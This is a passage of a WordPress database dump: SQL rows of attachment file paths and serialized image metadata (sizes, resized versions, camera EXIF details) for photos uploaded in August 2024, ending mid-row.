(2297,794,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1444;s:4:\"file\";s:27:\"2024/08/IMG_8189-scaled.jpg\";s:8:\"filesize\";i:646751;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG_8189-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18699;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG_8189-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147122;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_8189-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9242;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"IMG_8189-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90499;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"IMG_8189-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:287897;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:22:\"IMG_8189-2048x1155.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:456978;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_8189-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24321;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 11\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723109448\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:17:\"0.008695652173913\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"IMG_8189.jpg\";}'),
(2298,795,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1444;s:4:\"file\";s:27:\"2024/08/IMG_8171-scaled.jpg\";s:8:\"filesize\";i:533136;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG_8171-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13510;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG_8171-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105845;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_8171-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7427;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"IMG_8171-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64702;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"IMG_8171-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:215455;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:22:\"IMG_8171-2048x1155.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:357663;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_8171-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16836;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 11\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723108925\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:2:\"40\";s:13:\"shutter_speed\";s:17:\"0.008695652173913\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"IMG_8171.jpg\";}'),
(2299,793,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:27:\"2024/08/IMG_8156-scaled.jpg\";s:8:\"filesize\";i:870194;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG_8156-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24837;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG_8156-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197057;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_8156-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9674;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"IMG_8156-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120989;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"IMG_8156-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:385839;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:22:\"IMG_8156-2048x1536.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:613919;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_8156-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25641;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 11\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723106721\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"IMG_8156.jpg\";}'),
(2300,798,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:27:\"2024/08/IMG_8160-scaled.jpg\";s:8:\"filesize\";i:802327;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG_8160-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25352;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG_8160-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:193074;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_8160-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10185;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"IMG_8160-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120183;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"IMG_8160-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:367918;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:22:\"IMG_8160-2048x1536.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:573930;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_8160-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24956;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 11\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723107363\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"IMG_8160.jpg\";}'),
(2301,796,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:29:\"2024/08/DSC_1768_0-scaled.jpg\";s:8:\"filesize\";i:481101;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC_1768_0-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19120;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"DSC_1768_0-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122544;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1768_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8438;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC_1768_0-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79470;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"DSC_1768_0-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:220485;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"DSC_1768_0-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:339661;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1768_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20112;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723111501\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"52\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"DSC_1768_0.jpg\";}'),
(2302,797,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:29:\"2024/08/DSC_1725_0-scaled.jpg\";s:8:\"filesize\";i:519043;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC_1725_0-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15730;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"DSC_1725_0-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116841;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1725_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7334;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC_1725_0-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72741;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"DSC_1725_0-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:226378;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"DSC_1725_0-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:360673;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1725_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18766;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723110747\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"21\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.04\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"DSC_1725_0.jpg\";}'),
(2303,799,'_wp_attached_file','2024/08/DSC_1825_0-scaled.jpg'),
(2304,800,'_wp_attached_file','2024/08/DSC_1714_0-scaled.jpg'),
(2305,801,'_wp_attached_file','2024/08/DSC_1755_0-scaled.jpg'),
(2306,799,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:29:\"2024/08/DSC_1825_0-scaled.jpg\";s:8:\"filesize\";i:468384;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC_1825_0-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18486;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"DSC_1825_0-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120120;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1825_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8465;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC_1825_0-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77935;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"DSC_1825_0-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:218646;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"DSC_1825_0-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:334302;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1825_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20799;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723113047\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"38\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"DSC_1825_0.jpg\";}'),
(2307,800,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:29:\"2024/08/DSC_1714_0-scaled.jpg\";s:8:\"filesize\";i:565252;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC_1714_0-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20159;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"DSC_1714_0-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137860;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1714_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8927;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC_1714_0-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88240;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"DSC_1714_0-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:254783;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"DSC_1714_0-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:397018;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1714_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21043;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723110556\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"52\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"DSC_1714_0.jpg\";}'),
(2308,802,'_wp_attached_file','2024/08/DSC_1759_0-scaled.jpg'),
(2309,801,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:29:\"2024/08/DSC_1755_0-scaled.jpg\";s:8:\"filesize\";i:602359;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC_1755_0-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20783;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"DSC_1755_0-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149216;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1755_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8894;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC_1755_0-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94775;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"DSC_1755_0-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:277346;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"DSC_1755_0-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:429495;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1755_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23144;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723111188\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"38\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"DSC_1755_0.jpg\";}'),
(2310,803,'_wp_attached_file','2024/08/DSC_1724_0-scaled.jpg'),
(2311,804,'_wp_attached_file','2024/08/DSC_1772_0-scaled.jpg'),
(2312,802,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:29:\"2024/08/DSC_1759_0-scaled.jpg\";s:8:\"filesize\";i:594981;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC_1759_0-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21560;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"DSC_1759_0-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150918;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1759_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9303;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC_1759_0-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96747;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"DSC_1759_0-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:276782;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"DSC_1759_0-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:424567;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1759_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23736;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723111294\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"42\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"DSC_1759_0.jpg\";}'),
(2313,803,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:29:\"2024/08/DSC_1724_0-scaled.jpg\";s:8:\"filesize\";i:618362;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC_1724_0-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20217;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"DSC_1724_0-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148213;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1724_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8741;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC_1724_0-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92806;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"DSC_1724_0-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:279336;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"DSC_1724_0-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:436610;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1724_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21614;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723110692\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"52\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"DSC_1724_0.jpg\";}'),
(2314,804,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:29:\"2024/08/DSC_1772_0-scaled.jpg\";s:8:\"filesize\";i:521065;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC_1772_0-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17842;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"DSC_1772_0-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128372;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1772_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8558;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC_1772_0-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81379;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"DSC_1772_0-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:238951;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"DSC_1772_0-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:370970;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1772_